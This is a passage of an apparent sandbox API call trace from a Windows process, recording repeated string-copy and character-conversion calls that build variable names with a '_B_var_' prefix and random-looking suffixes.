lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="IQCAUAo") returned 8 [0069.898] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b82ad2 | out: _Dst=0x68767a0) returned 0x0 [0069.898] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_IQCAUAo" | out: _Dst="_B_var_IQCAUAo") returned 0x0 [0069.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_IQCAUAo") returned 15 [0069.898] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82ad2 | out: _Dst=0x144ec0) returned 0x0 [0069.899] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="LAUUAQ_" | out: _Dst="LAUUAQ_") returned 0x0 [0069.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="LAUUAQ_") returned 8 [0069.899] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b82afa | out: _Dst=0x68767a0) returned 0x0 [0069.899] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_LAUUAQ_" | out: _Dst="_B_var_LAUUAQ_") returned 0x0 [0069.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_LAUUAQ_") returned 15 [0069.899] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82afa | out: _Dst=0x144ec0) returned 0x0 [0069.899] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x68767a0) returned 0x0 [0069.899] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.899] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.899] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="nAcGC_" | out: _Dst="nAcGC_") returned 0x0 [0069.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="nAcGC_") returned 7 [0069.899] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82a5a | out: _Dst=0x68767a0) returned 0x0 [0069.899] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_nAcGC_" | out: _Dst="_B_var_nAcGC_") returned 0x0 [0069.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_nAcGC_") returned 14 [0069.899] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82a5a | out: _Dst=0x144ec0) returned 0x0 [0069.899] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="m_CAAUA" | out: _Dst="m_CAAUA") returned 0x0 [0069.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="m_CAAUA") returned 8 [0069.900] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b82b4e | out: _Dst=0x68767a0) returned 0x0 [0069.900] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_m_CAAUA" | out: _Dst="_B_var_m_CAAUA") returned 0x0 [0069.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_m_CAAUA") returned 15 [0069.900] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82b4e | out: _Dst=0x144ec0) returned 0x0 [0069.900] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="aB4GBCGk" | out: _Dst="aB4GBCGk") returned 0x0 [0069.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="aB4GBCGk") returned 9 [0069.900] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82b22 | out: _Dst=0x68767a0) returned 0x0 [0069.900] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_aB4GBCGk" | out: _Dst="_B_var_aB4GBCGk") returned 0x0 [0069.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_aB4GBCGk") returned 16 [0069.900] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82b22 | out: _Dst=0x144ec0) returned 0x0 [0069.900] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="SACBAAA" | out: _Dst="SACBAAA") returned 0x0 [0069.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="SACBAAA") returned 8 [0069.900] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b82b76 | out: _Dst=0x68767a0) returned 0x0 [0069.900] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_SACBAAA" | out: _Dst="_B_var_SACBAAA") returned 0x0 [0069.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_SACBAAA") returned 15 [0069.900] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82b76 | out: _Dst=0x144ec0) returned 0x0 [0069.900] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="dXkokX" | out: _Dst="dXkokX") returned 0x0 [0069.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="dXkokX") returned 7 [0069.901] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82b9e | out: _Dst=0x68767a0) returned 0x0 [0069.901] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_dXkokX" | out: _Dst="_B_var_dXkokX") returned 0x0 [0069.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_dXkokX") returned 14 [0069.901] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82b9e | out: _Dst=0x144ec0) returned 0x0 [0069.901] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="oADADA" | out: _Dst="oADADA") returned 0x0 [0069.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="oADADA") returned 7 [0069.901] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82bee | out: _Dst=0x68767a0) returned 0x0 [0069.901] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_oADADA" | out: _Dst="_B_var_oADADA") returned 0x0 [0069.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_oADADA") returned 14 [0069.901] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82bee | out: _Dst=0x144ec0) returned 0x0 [0069.901] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="CDAABB" | out: _Dst="CDAABB") returned 0x0 [0069.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="CDAABB") returned 7 [0069.901] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82bc6 | out: _Dst=0x68767a0) returned 0x0 [0069.901] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_CDAABB" | out: _Dst="_B_var_CDAABB") returned 0x0 [0069.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_CDAABB") returned 14 [0069.901] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82bc6 | out: _Dst=0x144ec0) returned 0x0 [0069.901] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="co1Q1UDU" | out: _Dst="co1Q1UDU") returned 0x0 [0069.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="co1Q1UDU") returned 9 [0069.901] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82c42 | out: _Dst=0x68767a0) returned 0x0 [0069.902] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_co1Q1UDU" | out: _Dst="_B_var_co1Q1UDU") returned 0x0 [0069.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_co1Q1UDU") returned 16 [0069.902] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82c42 | out: _Dst=0x144ec0) returned 0x0 [0069.902] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="DBUDQZ" | out: _Dst="DBUDQZ") returned 0x0 [0069.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="DBUDQZ") returned 7 [0069.902] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82c6e | out: _Dst=0x68767a0) returned 0x0 [0069.902] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_DBUDQZ" | out: _Dst="_B_var_DBUDQZ") returned 0x0 [0069.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_DBUDQZ") returned 14 [0069.902] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82c6e | out: _Dst=0x144ec0) returned 0x0 [0069.902] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="z_X4wAUA" | out: _Dst="z_X4wAUA") returned 0x0 [0069.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="z_X4wAUA") returned 9 [0069.902] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82c96 | out: _Dst=0x68767a0) returned 0x0 [0069.902] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_z_X4wAUA" | out: _Dst="_B_var_z_X4wAUA") returned 0x0 [0069.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_z_X4wAUA") returned 16 [0069.902] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82c96 | out: _Dst=0x144ec0) returned 0x0 [0069.902] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="jAxAGoGk" | out: _Dst="jAxAGoGk") returned 0x0 [0069.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="jAxAGoGk") returned 9 [0069.902] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82cc2 | out: _Dst=0x68767a0) returned 0x0 [0069.903] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_jAxAGoGk" | out: _Dst="_B_var_jAxAGoGk") returned 0x0 [0069.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_jAxAGoGk") returned 16 [0069.903] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82cc2 | out: _Dst=0x144ec0) returned 0x0 [0069.903] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x68767a0) returned 0x0 [0069.903] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.903] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.903] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="jcDD1c_G" | out: _Dst="jcDD1c_G") returned 0x0 [0069.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="jcDD1c_G") returned 9 [0069.903] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82c16 | out: _Dst=0x68767a0) returned 0x0 [0069.903] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_jcDD1c_G" | out: _Dst="_B_var_jcDD1c_G") returned 0x0 [0069.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_jcDD1c_G") returned 16 [0069.903] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82c16 | out: _Dst=0x144ec0) returned 0x0 [0069.903] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="DAAGQQ" | out: _Dst="DAAGQQ") returned 0x0 [0069.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="DAAGQQ") returned 7 [0069.903] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82d16 | out: _Dst=0x68767a0) returned 0x0 [0069.903] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_DAAGQQ" | out: _Dst="_B_var_DAAGQQ") returned 0x0 [0069.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_DAAGQQ") returned 14 [0069.903] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82d16 | out: _Dst=0x144ec0) returned 0x0 [0069.903] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="WQ1AAU" | out: _Dst="WQ1AAU") returned 0x0 [0069.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="WQ1AAU") returned 7 [0069.904] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82cee | out: _Dst=0x68767a0) returned 0x0 [0069.904] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_WQ1AAU" | out: _Dst="_B_var_WQ1AAU") returned 0x0 [0069.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_WQ1AAU") returned 14 [0069.904] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82cee | out: _Dst=0x144ec0) returned 0x0 [0069.904] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="fXcAoAAU" | out: _Dst="fXcAoAAU") returned 0x0 [0069.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="fXcAoAAU") returned 9 [0069.904] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82d3e | out: _Dst=0x68767a0) returned 0x0 [0069.904] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_fXcAoAAU" | out: _Dst="_B_var_fXcAoAAU") returned 0x0 [0069.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_fXcAoAAU") returned 16 [0069.904] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82d3e | out: _Dst=0x144ec0) returned 0x0 [0069.904] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="k4BDQABA" | out: _Dst="k4BDQABA") returned 0x0 [0069.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="k4BDQABA") returned 9 [0069.904] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82d6a | out: _Dst=0x68767a0) returned 0x0 [0069.904] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_k4BDQABA" | out: _Dst="_B_var_k4BDQABA") returned 0x0 [0069.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_k4BDQABA") returned 16 [0069.904] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82d6a | out: _Dst=0x144ec0) returned 0x0 [0069.904] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="ABAcAA" | out: _Dst="ABAcAA") returned 0x0 [0069.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="ABAcAA") returned 7 [0069.905] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82d96 | out: _Dst=0x68767a0) returned 0x0 [0069.905] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_ABAcAA" | out: _Dst="_B_var_ABAcAA") returned 0x0 [0069.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_ABAcAA") returned 14 [0069.905] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82d96 | out: _Dst=0x144ec0) returned 0x0 [0069.905] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="YACBQ1" | out: _Dst="YACBQ1") returned 0x0 [0069.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="YACBQ1") returned 7 [0069.905] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82dea | out: _Dst=0x68767a0) returned 0x0 [0069.905] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_YACBQ1" | out: _Dst="_B_var_YACBQ1") returned 0x0 [0069.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_YACBQ1") returned 14 [0069.905] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82dea | out: _Dst=0x144ec0) returned 0x0 [0069.905] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="PUAxADGA" | out: _Dst="PUAxADGA") returned 0x0 [0069.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="PUAxADGA") returned 9 [0069.905] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82dbe | out: _Dst=0x68767a0) returned 0x0 [0069.905] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_PUAxADGA" | out: _Dst="_B_var_PUAxADGA") returned 0x0 [0069.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_PUAxADGA") returned 16 [0069.905] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82dbe | out: _Dst=0x144ec0) returned 0x0 [0069.905] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="ABAQXA4c" | out: _Dst="ABAQXA4c") returned 0x0 [0069.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="ABAQXA4c") returned 9 [0069.906] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82e3a | out: _Dst=0x68767a0) returned 0x0 [0069.906] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_ABAQXA4c" | out: _Dst="_B_var_ABAQXA4c") returned 0x0 [0069.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_ABAQXA4c") returned 16 [0069.906] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82e3a | out: _Dst=0x144ec0) returned 0x0 [0069.906] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="wU1DAA" | out: _Dst="wU1DAA") returned 0x0 [0069.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="wU1DAA") returned 7 [0069.906] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82e66 | out: _Dst=0x68767a0) returned 0x0 [0069.906] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_wU1DAA" | out: _Dst="_B_var_wU1DAA") returned 0x0 [0069.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_wU1DAA") returned 14 [0069.906] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82e66 | out: _Dst=0x144ec0) returned 0x0 [0069.906] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="mAUDwAAo" | out: _Dst="mAUDwAAo") returned 0x0 [0069.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="mAUDwAAo") returned 9 [0069.906] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82e8e | out: _Dst=0x68767a0) returned 0x0 [0069.906] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_mAUDwAAo" | out: _Dst="_B_var_mAUDwAAo") returned 0x0 [0069.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_mAUDwAAo") returned 16 [0069.907] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82e8e | out: _Dst=0x144ec0) returned 0x0 [0069.907] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="f__11ABD" | out: _Dst="f__11ABD") returned 0x0 [0069.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="f__11ABD") returned 9 [0069.907] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82eba | out: _Dst=0x68767a0) returned 0x0 [0069.907] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_f__11ABD" | out: _Dst="_B_var_f__11ABD") returned 0x0 [0069.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_f__11ABD") returned 16 [0069.907] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82eba | out: _Dst=0x144ec0) returned 0x0 [0069.907] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x68767a0) returned 0x0 [0069.907] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.907] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.907] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="CDDGDAZ" | out: _Dst="CDDGDAZ") returned 0x0 [0069.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="CDDGDAZ") returned 8 [0069.907] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b82e12 | out: _Dst=0x68767a0) returned 0x0 [0069.907] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_CDDGDAZ" | out: _Dst="_B_var_CDDGDAZ") returned 0x0 [0069.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_CDDGDAZ") returned 15 [0069.907] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82e12 | out: _Dst=0x144ec0) returned 0x0 [0069.907] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="UCXAAXBA" | out: _Dst="UCXAAXBA") returned 0x0 [0069.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="UCXAAXBA") returned 9 [0069.908] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82f12 | out: _Dst=0x68767a0) returned 0x0 [0069.908] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_UCXAAXBA" | out: _Dst="_B_var_UCXAAXBA") returned 0x0 [0069.908] MultiByteToWideChar (in: 